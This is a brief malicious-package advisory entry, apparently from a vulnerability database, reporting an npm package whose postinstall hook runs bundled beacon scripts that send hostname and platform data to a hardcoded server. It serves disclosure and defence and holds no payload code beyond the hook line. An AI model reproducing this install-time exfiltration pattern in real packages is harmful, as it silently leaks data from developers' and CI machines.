MAL-2026-5738

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (6e89b603ffc718873a9d4c42167bf0c667c995cc2547bc9b99373ad4e9f0ca1e) On install, package.json's postinstall hook ("postinstall": "node run.js") triggers execution of bundled beacon scripts (beacon15.js and beacon_linux.js). These scripts pull in child_process, os, and http modules and issue outbound HTTP GET/POST requests carrying host identifiers including os.hostname() and os.platform(). The combination of automatic execution at install time, host-information collection, and outbound HTTP requests to a hardcoded destination is the canonical install-time exfiltration beacon shape. Any developer or CI system running `npm install` for this package will silently leak host data and execute code from the bundled scripts under the installing user's privileges.